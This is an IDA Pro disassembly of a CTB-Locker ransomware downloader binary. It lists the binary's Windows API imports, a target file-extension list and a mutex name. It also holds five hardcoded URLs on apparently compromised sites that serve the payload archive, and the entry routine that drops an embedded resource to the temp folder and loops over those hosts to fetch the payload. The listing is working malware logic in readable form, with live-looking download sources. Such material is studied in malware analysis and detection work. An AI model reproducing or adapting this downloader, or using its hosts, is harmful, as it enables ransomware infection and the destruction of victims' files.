.idata:00401000 ;
.idata:00401000 ; +-------------------------------------------------------------------------+
.idata:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.idata:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.idata:00401000 ; | Licensed to: |
.idata:00401000 ; +-------------------------------------------------------------------------+
.idata:00401000 ;
.idata:00401000 ; Input MD5 : 48C9B4DBFB4B163B0ABB03F74E1834B1
.idata:00401000
.idata:00401000 ; File Name : CTB_Locker_download_payload.bin
.idata:00401000 ; Format : Portable executable for 80386 (PE)
.idata:00401000 ; Imagebase : 400000
.idata:00401000 ; Section 1. (virtual address 00001000)
.idata:00401000 ; Virtual size : 00001110 ( 4368.)
.idata:00401000 ; Section size in file : 00001200 ( 4608.)
.idata:00401000 ; Offset to raw data for section: 00000200
.idata:00401000 ; Flags E0000020: Text Executable Readable Writable
.idata:00401000 ; Alignment : default
.idata:00401000 ;
.idata:00401000 ; Imports from KERNEL32.dll
.idata:00401000 ;
.idata:00401000
.idata:00401000 include uni.inc ; see unicode subdir of ida for info on unicode
.idata:00401000
.idata:00401000 .686p
.idata:00401000 .mmx
.idata:00401000 .model flat
.idata:00401000
.idata:00401000 ; ===========================================================================
.idata:00401000
.idata:00401000 ; Segment type: Externs
.idata:00401000 ; _idata
.idata:00401000 ; void __stdcall ExitProcess(UINT uExitCode)
.idata:00401000 ?? ?? ?? ?? extrn ExitProcess:dword ; CODE XREF: start+24Dp
.idata:00401000 ; sub_40197F+3Ep
.idata:00401000 ; DATA XREF: ...
.idata:00401004 ; HRSRC __stdcall FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType)
.idata:00401004 ?? ?? ?? ?? extrn FindResourceA:dword
.idata:00401004 ; CODE XREF: start+BCp
.idata:00401004 ; start+D7p
.idata:00401004 ; DATA XREF: ...
.idata:00401008 ; HGLOBAL __stdcall LoadResource(HMODULE hModule, HRSRC hResInfo)
.idata:00401008 ?? ?? ?? ?? extrn LoadResource:dword
.idata:00401008 ; CODE XREF: start+F2p
.idata:00401008 ; start+FEp
.idata:00401008 ; DATA XREF: ...
.idata:0040100C ; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
.idata:0040100C ?? ?? ?? ?? extrn VirtualFree:dword ; CODE XREF: start+2A0p
.idata:0040100C ; sub_401C0D+199p
.idata:0040100C ; DATA XREF: ...
.idata:00401010 ; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
.idata:00401010 ?? ?? ?? ?? extrn WriteFile:dword ; CODE XREF: start+1A8p
.idata:00401010 ; sub_401DB3+75p
.idata:00401010 ; DATA XREF: ...
.idata:00401014 ; void __stdcall Sleep(DWORD dwMilliseconds)
.idata:00401014 ?? ?? ?? ?? extrn Sleep:dword ; CODE XREF: start+264p
.idata:00401014 ; start+2BCp ...
.idata:00401018 ; DWORD __stdcall SizeofResource(HMODULE hModule, HRSRC hResInfo)
.idata:00401018 ?? ?? ?? ?? extrn SizeofResource:dword
.idata:00401018 ; CODE XREF: start+11Ep
.idata:00401018 ; DATA XREF: start+11Er
.idata:0040101C ; DWORD __stdcall GetModuleFileNameW(HMODULE hModule, LPWCH lpFilename, DWORD nSize)
.idata:0040101C ?? ?? ?? ?? extrn GetModuleFileNameW:dword
.idata:0040101C ; CODE XREF: start+1D0p
.idata:0040101C ; DATA XREF: start+1D0r
.idata:00401020 ; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
.idata:00401020 ?? ?? ?? ?? extrn CreateFileW:dword ; CODE XREF: start+185p
.idata:00401020 ; sub_401DB3+5Bp
.idata:00401020 ; DATA XREF: ...
.idata:00401024 ; int __stdcall lstrlenW(LPCWSTR lpString)
.idata:00401024 ?? ?? ?? ?? extrn lstrlenW:dword ; CODE XREF: sub_401AFC+2Bp
.idata:00401024 ; sub_401C0D+52p ...
.idata:00401028 ; DWORD __stdcall GetTempPathW(DWORD nBufferLength, LPWSTR lpBuffer)
.idata:00401028 ?? ?? ?? ?? extrn GetTempPathW:dword
.idata:00401028 ; CODE XREF: start+12Ep
.idata:00401028 ; DATA XREF: start+12Er
.idata:0040102C ; DWORD __stdcall GetLastError()
.idata:0040102C ?? ?? ?? ?? extrn GetLastError:dword
.idata:0040102C ; CODE XREF: start+23Fp
.idata:0040102C ; DATA XREF: start+23Fr
.idata:00401030 ; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
.idata:00401030 ?? ?? ?? ?? extrn GetProcAddress:dword
.idata:00401030 ; CODE XREF: sub_4019C4+7Bp
.idata:00401030 ; sub_4019C4+88p ...
.idata:00401034 ; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
.idata:00401034 ?? ?? ?? ?? extrn VirtualAlloc:dword
.idata:00401034 ; CODE XREF: start+75p
.idata:00401034 ; start+82p ...
.idata:00401038 ; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
.idata:00401038 ?? ?? ?? ?? extrn LoadLibraryA:dword
.idata:00401038 ; CODE XREF: sub_4019C4+11p
.idata:00401038 ; sub_4019C4+1Ap ...
.idata:0040103C ; LPVOID __stdcall LockResource(HGLOBAL hResData)
.idata:0040103C ?? ?? ?? ?? extrn LockResource:dword
.idata:0040103C ; CODE XREF: start+113p
.idata:0040103C ; DATA XREF: start+113r
.idata:00401040 ; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
.idata:00401040 ?? ?? ?? ?? extrn GetModuleHandleA:dword
.idata:00401040 ; CODE XREF: start+D0p
.idata:00401040 ; start+EBp
.idata:00401040 ; DATA XREF: ...
.idata:00401044 ; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
.idata:00401044 ?? ?? ?? ?? extrn CreateMutexA:dword
.idata:00401044 ; CODE XREF: start+239p
.idata:00401044 ; DATA XREF: start+239r
.idata:00401048 ; BOOL __stdcall CloseHandle(HANDLE hObject)
.idata:00401048 ?? ?? ?? ?? extrn CloseHandle:dword ; CODE XREF: start+1AFp
.idata:00401048 ; sub_401DB3+7Ep
.idata:00401048 ; DATA XREF: ...
.idata:0040104C ; BOOL __stdcall DeleteFileW(LPCWSTR lpFileName)
.idata:0040104C ?? ?? ?? ?? extrn DeleteFileW:dword ; CODE XREF: sub_401DB3+C3p
.idata:0040104C ; DATA XREF: sub_401DB3+C3r
.idata:00401050
.idata:00401054 ;
.idata:00401054 ; Imports from USER32.dll
.idata:00401054 ;
.idata:00401054 ; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
.idata:00401054 ?? ?? ?? ?? extrn MessageBoxA:dword ; CODE XREF: sub_40197F+36p
.idata:00401054 ; DATA XREF: sub_40197F+36r
.idata:00401054
.text:00401058 ; ===========================================================================
.text:00401058
.text:00401058 ; Segment type: Pure code
.text:00401058 ; Segment permissions: Read/Write/Execute
.text:00401058 _text segment para public 'CODE' use32
.text:00401058 assume cs:_text
.text:00401058 ;org 401058h
.text:00401058 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00401058 00 00 00 00 00 00+ align 10h
.text:00401060 aShopOye_itXxxi: ; DATA XREF: start+32o
.text:00401060 73 00 68 00 6F 00+ unicode 0, <shop-oye.it/XXXinstallXXX/abc.tar.gz>,0
.text:004010AA 00 00 align 4
.text:004010AC aAspiroflash_fr: ; DATA XREF: start+39o
.text:004010AC 61 00 73 00 70 00+ unicode 0, <aspiroflash.fr/cai/abc.tar.gz>,0
.text:004010E8 aDieideenwerkst: ; DATA XREF: start+40o
.text:004010E8 64 00 69 00 65 00+ unicode 0, <dieideenwerkstatt.at/css/abc.tar.gz>,0
.text:00401130 aFirststepbaham: ; DATA XREF: start+47o
.text:00401130 66 00 69 00 72 00+ unicode 0, <firststepbahamas.com/PDF/abc.tar.gz>,0
.text:00401178 aWymianaWsb_cba: ; DATA XREF: start+4Eo
.text:00401178 77 00 79 00 6D 00+ unicode 0, <wymiana-wsb.cba.pl/pp/abc.tar.gz>,0
.text:004011BA 00 00 align 4
.text:004011BC 70 6F 6B 6A 75 73+aPokjuszo db 'pokjuszo',0 ; DATA XREF: start+16o
.text:004011C5 00 00 00 align 4
.text:004011C8 ; char Type[]
.text:004011C8 44 41 54 41 00 Type db 'DATA',0 ; DATA XREF: start+AFo
.text:004011C8 ; start+C5o
.text:004011CD 00 00 00 align 10h
.text:004011D0 aSS: ; DATA XREF: start+155o
.text:004011D0 ; sub_401DB3+2Eo
.text:004011D0 25 00 73 00 25 00+ unicode 0, <%s%s>,0
.text:004011DA 00 00 align 4
.text:004011DC aAeoiuy_: ; DATA XREF: sub_4017BB+Co
.text:004011DC 61 00 65 00 6F 00+ unicode 0, <aeoiuy.>,0
.text:004011EC aQwrtpsdfghjklz: ; DATA XREF: sub_4017BB+24o
.text:004011EC 71 00 77 00 72 00+ unicode 0, <qwrtpsdfghjklzxcvbnm>,0
.text:00401216 00 00 align 4
.text:00401218 aTxtrtfdocchmhl: ; DATA XREF: sub_4017BB+37o
.text:00401218 74 00 78 00 74 00+ unicode 0, <txtrtfdocchmhlpttfpdffb2xlspptmdbcdawavwmamp3avimpgmdvflv>
.text:00401218 72 00 74 00 66 00+ unicode 0, <swfwmvvobbmpgifjpgpngisomdfmdsbindatnrg3gpoggvobexedll>,0
.text:004012F8 45 72 72 6F 72 20+aErrorCodeD db 'Error code #%d',0 ; DATA XREF: sub_40197F+12o
.text:00401307 00 align 4
.text:00401308 ; char Caption[]
.text:00401308 45 72 72 6F 72 00 Caption db 'Error',0 ; DATA XREF: sub_40197F+28o
.text:0040130E 00 00 align 10h
.text:00401310 ; char LibFileName[]
.text:00401310 53 48 4C 57 41 50+LibFileName db 'SHLWAPI.DLL',0 ; DATA XREF: sub_4019C4+Co
.text:0040131C ; char aSetupapi_dll[]
.text:0040131C 53 45 54 55 50 41+aSetupapi_dll db 'SETUPAPI.DLL',0 ; DATA XREF: sub_4019C4+13o
.text:00401329 00 00 00 align 4
.text:0040132C ; char aShell32_dll[]
.text:0040132C 53 48 45 4C 4C 33+aShell32_dll db 'SHELL32.DLL',0 ; DATA XREF: sub_4019C4+1Co
.text:00401338 ; char aWinhttp_dll[]
.text:00401338 57 49 4E 48 54 54+aWinhttp_dll db 'WINHTTP.DLL',0 ; DATA XREF: sub_4019C4+25o
.text:00401344 ; char aAdvapi32_dll[]
.text:00401344 41 44 56 41 50 49+aAdvapi32_dll db 'ADVAPI32.DLL',0 ; DATA XREF: sub_4019C4+30o
.text:00401351 00 00 00 align 4
.text:00401354 ; char ProcName[]
.text:00401354 77 6E 73 70 72 69+ProcName db 'wnsprintfA',0 ; DATA XREF: sub_4019C4+75o
.text:0040135F 00 align 10h
.text:00401360 ; char aWnsprintfw[]
.text:00401360 77 6E 73 70 72 69+aWnsprintfw db 'wnsprintfW',0 ; DATA XREF: sub_4019C4+7Do
.text:0040136B 00 align 4
.text:0040136C ; char aSetupiterateca[]
.text:0040136C 53 65 74 75 70 49+aSetupiterateca db 'SetupIterateCabinetW',0
.text:0040136C 74 65 72 61 74 65+ ; DATA XREF: sub_4019C4+8Ao
.text:00401381 00 00 00 align 4
.text:00401384 ; char aShellexecutew[]
.text:00401384 53 68 65 6C 6C 45+aShellexecutew db 'ShellExecuteW',0 ; DATA XREF: sub_4019C4+97o
.text:00401392 00 00 align 4
.text:00401394 ; char aStrstriw[]
.text:00401394 53 74 72 53 74 72+aStrstriw db 'StrStrIW',0 ; DATA XREF: sub_4019C4+A7o
.text:0040139D 00 00 00 align 10h
.text:004013A0 ; char aSystemfunction[]
.text:004013A0 53 79 73 74 65 6D+aSystemfunction db 'SystemFunction036',0
.text:004013A0 46 75 6E 63 74 69+ ; DATA XREF: sub_4019C4+B4o
.text:004013B2 00 00 align 4
.text:004013B4 ; char aWinhttpqueryda[]
.text:004013B4 57 69 6E 48 74 74+aWinhttpqueryda db 'WinHttpQueryDataAvailable',0
.text:004013B4 70 51 75 65 72 79+ ; DATA XREF: sub_4019C4+C4o
.text:004013CE 00 00 align 10h
.text:004013D0 ; char aWinhttpreceive[]
.text:004013D0 57 69 6E 48 74 74+aWinhttpreceive db 'WinHttpReceiveResponse',0
.text:004013D0 70 52 65 63 65 69+ ; DATA XREF: sub_4019C4+D1o
.text:004013E7 00 align 4
.text:004013E8 ; char aWinhttpsendreq[]
.text:004013E8 57 69 6E 48 74 74+aWinhttpsendreq db 'WinHttpSendRequest',0
.text:004013E8 70 53 65 6E 64 52+ ; DATA XREF: sub_4019C4+DEo
.text:004013FB 00 align 4
.text:004013FC ; char aWinhttpsetopti[]
.text:004013FC 57 69 6E 48 74 74+aWinhttpsetopti db 'WinHttpSetOption',0 ; DATA XREF: sub_4019C4+EBo
.text:0040140D 00 00 00 align 10h
.text:00401410 ; char aWinhttpopenreq[]
.text:00401410 57 69 6E 48 74 74+aWinhttpopenreq db 'WinHttpOpenRequest',0
.text:00401410 70 4F 70 65 6E 52+ ; DATA XREF: sub_4019C4+F8o
.text:00401423 00 align 4
.text:00401424 ; char aWinhttpconnect[]
.text:00401424 57 69 6E 48 74 74+aWinhttpconnect db 'WinHttpConnect',0 ; DATA XREF: sub_4019C4+105o
.text:00401433 00 align 4
.text:00401434 ; char aWinhttpopen[]
.text:00401434 57 69 6E 48 74 74+aWinhttpopen db 'WinHttpOpen',0 ; DATA XREF: sub_4019C4+112o
.text:00401440 ; char aWinhttpreaddat[]
.text:00401440 57 69 6E 48 74 74+aWinhttpreaddat db 'WinHttpReadData',0 ; DATA XREF: sub_4019C4+11Fo
.text:00401450 aSS_S: ; DATA XREF: sub_401AFC+87o
.text:00401450 25 00 73 00 25 00+ unicode 0, <%s%s.%s>,0
.text:00401460 aS: ; DATA XREF: sub_401AFC+A2o
.text:00401460 ; sub_401C0D+1Bo
.text:00401460 25 00 73 00 00 00 unicode 0, <%s>,0
.text:00401466 00 00 align 4
.text:00401468 asc_401468: ; DATA XREF: sub_401C0D+Co
.text:00401468 2F 00 00 00 unicode 0, </>,0
.text:0040146C 00 00 00 00 align 10h
.text:00401470 aMozilla4_0Comp: ; DATA XREF: sub_401C0D+69o
.text:00401470 4D 00 6F 00 7A 00+ unicode 0, <Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)>,0
.text:004014D6 00 00 align 4
.text:004014D8 aGet: ; DATA XREF: sub_401C0D+B6o
.text:004014D8 47 00 45 00 54 00+ unicode 0, <GET>,0
.text:004014E0
.text:004014E0 ; =============== S U B R O U T I N E =======================================
.text:004014E0
.text:004014E0 ; Attributes: noreturn bp-based frame
.text:004014E0
.text:004014E0 ; int __cdecl start(HMODULE hModule)
.text:004014E0 public start
.text:004014E0 start proc near
.text:004014E0
.text:004014E0 Filename = word ptr -0A4Ch
.text:004014E0 FileName = word ptr -64Ch
.text:004014E0 var_24C = byte ptr -24Ch
.text:004014E0 Name = byte ptr -44h
.text:004014E0 lpString = dword ptr -38h
.text:004014E0 var_34 = word ptr -34h
.text:004014E0 var_30 = dword ptr -30h
.text:004014E0 var_2C = word ptr -2Ch
.text:004014E0 var_28 = dword ptr -28h
.text:004014E0 var_24 = word ptr -24h
.text:004014E0 var_20 = dword ptr -20h
.text:004014E0 var_1C = word ptr -1Ch
.text:004014E0 var_18 = dword ptr -18h
.text:004014E0 var_14 = word ptr -14h
.text:004014E0 NumberOfBytesWritten= dword ptr -10h
.text:004014E0 var_C = dword ptr -0Ch
.text:004014E0 lpBuffer = dword ptr -8
.text:004014E0 dwMilliseconds = dword ptr -4
.text:004014E0 hModule = dword ptr 8
.text:004014E0
.text:004014E0 55 push ebp
.text:004014E1 8B EC mov ebp, esp
.text:004014E3 81 EC 4C 0A 00 00 sub esp, 0A4Ch
.text:004014E9 53 push ebx
.text:004014EA 56 push esi
.text:004014EB 57 push edi
.text:004014EC 6A 24 push 24h
.text:004014EE 58 pop eax
.text:004014EF 6A 1D push 1Dh
.text:004014F1 66 89 45 CC mov [ebp+var_34], ax
.text:004014F5 58 pop eax
.text:004014F6 BE BC 11 40 00 mov esi, offset aPokjuszo ; "pokjuszo"
.text:004014FB 8D 7D BC lea edi, [ebp+Name]
.text:004014FE A5 movsd
.text:004014FF 6A 23 push 23h
.text:00401501 66 89 45 D4 mov [ebp+var_2C], ax
.text:00401505 58 pop eax
.text:00401506 A5 movsd
.text:00401507 66 89 45 DC mov [ebp+var_24], ax
.text:0040150B 66 89 45 E4 mov [ebp+var_1C], ax
.text:0040150F 6A 20 push 20h
.text:00401511 58 pop eax
.text:00401512 C7 45 C8 60 10 40+ mov [ebp+lpString], offset aShopOye_itXxxi ; "shop-oye.it/XXXinstallXXX/abc.tar.gz"
.text:00401519 C7 45 D0 AC 10 40+ mov [ebp+var_30], offset aAspiroflash_fr ; "aspiroflash.fr/cai/abc.tar.gz"
.text:00401520 C7 45 D8 E8 10 40+ mov [ebp+var_28], offset aDieideenwerkst ; "dieideenwerkstatt.at/css/abc.tar.gz"
.text:00401527 C7 45 E0 30 11 40+ mov [ebp+var_20], offset aFirststepbaham ; "firststepbahamas.com/PDF/abc.tar.gz"
.text:0040152E C7 45 E8 78 11 40+ mov [ebp+var_18], offset aWymianaWsb_cba ; "wymiana-wsb.cba.pl/pp/abc.tar.gz"
.text:00401535 66 89 45 EC mov [ebp+var_14], ax
.text:00401539 A4 movsb
.text:0040153A E8 85 04 00 00 call sub_4019C4
.text:0040153F 8B 35 34 10 40 00 mov esi, VirtualAlloc
.text:00401545 6A 04 push 4 ; flProtect
.text:00401547 BF 00 10 00 00 mov edi, 1000h
.text:0040154C 57 push edi ; flAllocationType
.text:0040154D BB 00 02 00 00 mov ebx, 200h
.text:00401552 53 push ebx ; dwSize
.text:00401553 6A 00 push 0 ; lpAddress
.text:00401555 FF D6 call esi ; VirtualAlloc
.text:00401557 6A 04 push 4 ; flProtect
.text:00401559 57 push edi ; flAllocationType
.text:0040155A 53 push ebx ; dwSize
.text:0040155B 6A 00 push 0 ; lpAddress
.text:0040155D A3 F8 1E 40 00 mov dword_401EF8, eax
.text:00401562 FF D6 call esi ; VirtualAlloc
.text:00401564 6A 04 push 4 ; flProtect
.text:00401566 57 push edi ; flAllocationType
.text:00401567 53 push ebx ; dwSize
.text:00401568 6A 00 push 0 ; lpAddress
.text:0040156A A3 D8 1E 40 00 mov lpBuffer, eax
.text:0040156F FF D6 call esi ; VirtualAlloc
.text:00401571 6A 04 push 4 ; flProtect
.text:00401573 57 push edi ; flAllocationType
.text:00401574 6A 0C push 0Ch ; dwSize
.text:00401576 6A 00 push 0 ; lpAddress
.text:00401578 A3 EC 1E 40 00 mov dword_401EEC, eax
.text:0040157D FF D6 call esi ; VirtualAlloc
.text:0040157F 6A 04 push 4 ; flProtect
.text:00401581 57 push edi ; flAllocationType
.text:00401582 6A 10 push 10h ; dwSize
.text:00401584 33 FF xor edi, edi
.text:00401586 57 push edi ; lpAddress
.text:00401587 FF D6 call esi ; VirtualAlloc
.text:00401589 8B 35 04 10 40 00 mov esi, FindResourceA
.text:0040158F 68 C8 11 40 00 push offset Type ; "DATA"
.text:00401594 68 E9 03 00 00 push 3E9h ; lpName
.text:00401599 FF 75 08 push [ebp+hModule] ; hModule
.text:0040159C FF D6 call esi ; FindResourceA
.text:0040159E 89 45 F8 mov [ebp+lpBuffer], eax
.text:004015A1 3B C7 cmp eax, edi
.text:004015A3 75 35 jnz short loc_4015DA
.text:004015A5 68 C8 11 40 00 push offset Type ; "DATA"
.text:004015AA 68 E9 03 00 00 push 3E9h ; lpName
.text:004015AF 57 push edi ; lpModuleName
.text:004015B0 FF 15 40 10 40 00 call GetModuleHandleA
.text:004015B6 50 push eax ; hModule
.text:004015B7 FF D6 call esi ; FindResourceA
.text:004015B9 8B F0 mov esi, eax
.text:004015BB 3B F7 cmp esi, edi
.text:004015BD 75 0A jnz short loc_4015C9
.text:004015BF 68 E8 03 00 00 push 3E8h
.text:004015C4
.text:004015C4 loc_4015C4: ; CODE XREF: start+110j
.text:004015C4 ; start+197j ...
.text:004015C4 E8 B6 03 00 00 call sub_40197F
.text:004015C9 ; ---------------------------------------------------------------------------
.text:004015C9
.text:004015C9 loc_4015C9: ; CODE XREF: start+DDj
.text:004015C9 56 push esi ; hResInfo
.text:004015CA 57 push edi ; lpModuleName
.text:004015CB FF 15 40 10 40 00 call GetModuleHandleA
.text:004015D1 50 push eax ; hModule
.text:004015D2 FF 15 08 10 40 00 call LoadResource
.text:004015D8 EB 0D jmp short loc_4015E7
.text:004015DA ; ---------------------------------------------------------------------------
.text:004015DA
.text:004015DA loc_4015DA: ; CODE XREF: start+C3j
.text:004015DA 50 push eax ; hResInfo
.text:004015DB FF 75 08 push [ebp+hModule] ; hModule
.text:004015DE FF 15 08 10 40 00 call LoadResource
.text:004015E4 8B 75 F8 mov esi, [ebp+lpBuffer]
.text:004015E7
.text:004015E7 loc_4015E7: ; CODE XREF: start+F8j
.text:004015E7 3B C7 cmp eax, edi
.text:004015E9 75 07 jnz short loc_4015F2
.text:004015EB 68 E9 03 00 00 push 3E9h
.text:004015F0 EB D2 jmp short loc_4015C4
.text:004015F2 ; ---------------------------------------------------------------------------
.text:004015F2
.text:004015F2 loc_4015F2: ; CODE XREF: start+109j
.text:004015F2 50 push eax ; hResData
.text:004015F3 FF 15 3C 10 40 00 call LockResource
.text:004015F9 56 push esi ; hResInfo
.text:004015FA 57 push edi ; hModule
.text:004015FB 89 45 F8 mov [ebp+lpBuffer], eax
.text:004015FE FF 15 18 10 40 00 call SizeofResource
.text:00401604 FF 35 D8 1E 40 00 push lpBuffer ; lpBuffer
.text:0040160A 89 45 FC mov [ebp+dwMilliseconds], eax
.text:0040160D 53 push ebx ; nBufferLength
.text:0040160E FF 15 28 10 40 00 call GetTempPathW
.text:00401614 57 push edi
.text:00401615 8D 85 B4 FD FF FF lea eax, [ebp+var_24C]
.text:0040161B 6A 09 push 9
.text:0040161D 50 push eax
.text:0040161E E8 98 01 00 00 call sub_4017BB
.text:00401623 8D 85 B4 FD FF FF lea eax, [ebp+var_24C]
.text:00401629 50 push eax
.text:0040162A FF 35 D8 1E 40 00 push lpBuffer
.text:00401630 BB FF 00 00 00 mov ebx, 0FFh
.text:00401635 68 D0 11 40 00 push offset aSS ; "%s%s"
.text:0040163A 8D 85 B4 F9 FF FF lea eax, [ebp+FileName]
.text:00401640 53 push ebx
.text:00401641 50 push eax
.text:00401642 FF 15 FC 1E 40 00 call dword_401EFC
.text:00401648 83 C4 20 add esp, 20h
.text:0040164B 57 push edi ; hTemplateFile
.text:0040164C 68 80 00 00 00 push 80h ; dwFlagsAndAttributes
.text:00401651 6A 02 push 2 ; dwCreationDisposition
.text:00401653 57 push edi ; lpSecurityAttributes
.text:00401654 6A 01 push 1 ; dwShareMode
.text:00401656 68 00 00 00 40 push 40000000h ; dwDesiredAccess
.text:0040165B 8D 85 B4 F9 FF FF lea eax, [ebp+FileName]
.text:00401661 50 push eax ; lpFileName
.text:00401662 89 7D F0 mov [ebp+NumberOfBytesWritten], edi
.text:00401665 FF 15 20 10 40 00 call CreateFileW
.text:0040166B 8B F0 mov esi, eax
.text:0040166D 83 FE FF cmp esi, 0FFFFFFFFh
.text:00401670 75 0A jnz short loc_40167C
.text:00401672 68 EA 03 00 00 push 3EAh
.text:00401677 E9 48 FF FF FF jmp loc_4015C4
.text:0040167C ; ---------------------------------------------------------------------------
.text:0040167C
.text:0040167C loc_40167C: ; CODE XREF: start+190j
.text:0040167C 57 push edi ; lpOverlapped
.text:0040167D 8D 45 F0 lea eax, [ebp+NumberOfBytesWritten]
.text:00401680 50 push eax ; lpNumberOfBytesWritten
.text:00401681 FF 75 FC push [ebp+dwMilliseconds] ; nNumberOfBytesToWrite
.text:00401684 FF 75 F8 push [ebp+lpBuffer] ; lpBuffer
.text:00401687 56 push esi ; hFile
.text:00401688 FF 15 10 10 40 00 call WriteFile
.text:0040168E 56 push esi ; hObject
.text:0040168F FF 15 48 10 40 00 call CloseHandle
.text:00401695 8B 45 FC mov eax, [ebp+dwMilliseconds]
.text:00401698 39 45 F0 cmp [ebp+NumberOfBytesWritten], eax
.text:0040169B 74 0A jz short loc_4016A7
.text:0040169D 68 EB 03 00 00 push 3EBh
.text:004016A2 E9 1D FF FF FF jmp loc_4015C4
.text:004016A7 ; ---------------------------------------------------------------------------
.text:004016A7
.text:004016A7 loc_4016A7: ; CODE XREF: start+1BBj
.text:004016A7 53 push ebx ; nSize
.text:004016A8 8D 85 B4 F5 FF FF lea eax, [ebp+Filename]
.text:004016AE 50 push eax ; lpFilename
.text:004016AF 57 push edi ; hModule
.text:004016B0 FF 15 1C 10 40 00 call GetModuleFileNameW
.text:004016B6 3B C7 cmp eax, edi
.text:004016B8 75 0A jnz short loc_4016C4
.text:004016BA 68 EC 03 00 00 push 3ECh
.text:004016BF E9 00 FF FF FF jmp loc_4015C4
.text:004016C4 ; ---------------------------------------------------------------------------
.text:004016C4
.text:004016C4 loc_4016C4: ; CODE XREF: start+1D8j
.text:004016C4 8B C8 mov ecx, eax
.text:004016C6 8D 85 B4 F5 FF FF lea eax, [ebp+Filename]
.text:004016CC E8 E6 04 00 00 call sub_401BB7
.text:004016D1 85 C0 test eax, eax
.text:004016D3 75 0A jnz short loc_4016DF
.text:004016D5 68 ED 03 00 00 push 3EDh
.text:004016DA E9 E5 FE FF FF jmp loc_4015C4
.text:004016DF ; ---------------------------------------------------------------------------
.text:004016DF
.text:004016DF loc_4016DF: ; CODE XREF: start+1F3j
.text:004016DF 57 push edi
.text:004016E0 68 FC 1A 40 00 push offset sub_401AFC
.text:004016E5 57 push edi
.text:004016E6 8D 85 B4 F9 FF FF lea eax, [ebp+FileName]
.text:004016EC 50 push eax
.text:004016ED FF 15 F0 1E 40 00 call dword_401EF0
.text:004016F3 85 C0 test eax, eax
.text:004016F5 75 0A jnz short loc_401701
.text:004016F7 68 EE 03 00 00 push 3EEh
.text:004016FC E9 C3 FE FF FF jmp loc_4015C4
.text:00401701 ; ---------------------------------------------------------------------------
.text:00401701
.text:00401701 loc_401701: ; CODE XREF: start+215j
.text:00401701 6A 0A push 0Ah
.text:00401703 57 push edi
.text:00401704 57 push edi
.text:00401705 FF 35 EC 1E 40 00 push dword_401EEC
.text:0040170B 57 push edi
.text:0040170C 57 push edi
.text:0040170D FF 15 DC 1E 40 00 call dword_401EDC
.text:00401713 8D 45 BC lea eax, [ebp+Name]
.text:00401716 50 push eax ; lpName
.text:00401717 57 push edi ; bInitialOwner
.text:00401718 57 push edi ; lpMutexAttributes
.text:00401719 FF 15 44 10 40 00 call CreateMutexA
.text:0040171F FF 15 2C 10 40 00 call GetLastError
.text:00401725 3D B7 00 00 00 cmp eax, 0B7h
.text:0040172A 75 07 jnz short loc_401733
.text:0040172C
.text:0040172C loc_40172C: ; CODE XREF: start+2D6j
.text:0040172C 57 push edi ; uExitCode
.text:0040172D FF 15 00 10 40 00 call ExitProcess
.text:00401733 ; ---------------------------------------------------------------------------
.text:00401733
.text:00401733 loc_401733: ; CODE XREF: start+24Aj
.text:00401733 68 90 D0 03 00 push 3D090h
.text:00401738 B8 D0 DD 06 00 mov eax, 6DDD0h
.text:0040173D E8 5F 01 00 00 call sub_4018A1
.text:00401742 59 pop ecx
.text:00401743 50 push eax ; dwMilliseconds
.text:00401744 FF 15 14 10 40 00 call Sleep
.text:0040174A BB 88 13 00 00 mov ebx, 1388h
.text:0040174F 89 7D F4 mov [ebp+var_C], edi
.text:00401752 89 5D FC mov [ebp+dwMilliseconds], ebx
.text:00401755
.text:00401755 loc_401755: ; CODE XREF: start+2C2j
.text:00401755 8D 45 F8 lea eax, [ebp+lpBuffer]
.text:00401758 50 push eax ; int
.text:00401759 8B 45 F4 mov eax, [ebp+var_C]
.text:0040175C FF 74 C5 C8 push [ebp+eax*8+lpString] ; lpString
.text:00401760 E8 A8 04 00 00 call sub_401C0D
.text:00401765 8B F0 mov esi, eax
.text:00401767 59 pop ecx
.text:00401768 59 pop ecx
.text:00401769 3B F7 cmp esi, edi
.text:0040176B 74 19 jz short loc_401786
.text:0040176D 8B 4D F8 mov ecx, [ebp+lpBuffer]
.text:00401770 E8 52 01 00 00 call sub_4018C7
.text:00401775 85 C0 test eax, eax
.text:00401777 75 2B jnz short loc_4017A4
.text:00401779 68 00 80 00 00 push 8000h ; dwFreeType
.text:0040177E 57 push edi ; dwSize
.text:0040177F 56 push esi ; lpAddress
.text:00401780 FF 15 0C 10 40 00 call VirtualFree
.text:00401786
.text:00401786 loc_401786: ; CODE XREF: start+28Bj
.text:00401786 FF 45 F4 inc [ebp+var_C]
.text:00401789 83 7D F4 05 cmp [ebp+var_C], 5
.text:0040178D 75 0A jnz short loc_401799
.text:0040178F 01 5D FC add [ebp+dwMilliseconds], ebx
.text:00401792 C7 45 F4 01 00 00+ mov [ebp+var_C], 1
.text:00401799
.text:00401799 loc_401799: ; CODE XREF: start+2ADj
.text:00401799 FF 75 FC push [ebp+dwMilliseconds] ; dwMilliseconds
.text:0040179C FF 15 14 10 40 00 call Sleep
.text:004017A2 EB B1 jmp short loc_401755
.text:004017A4 ; ---------------------------------------------------------------------------
.text:004017A4
.text:004017A4 loc_4017A4: ; CODE XREF: start+297j
.text:004017A4 8B 45 F8 mov eax, [ebp+lpBuffer]
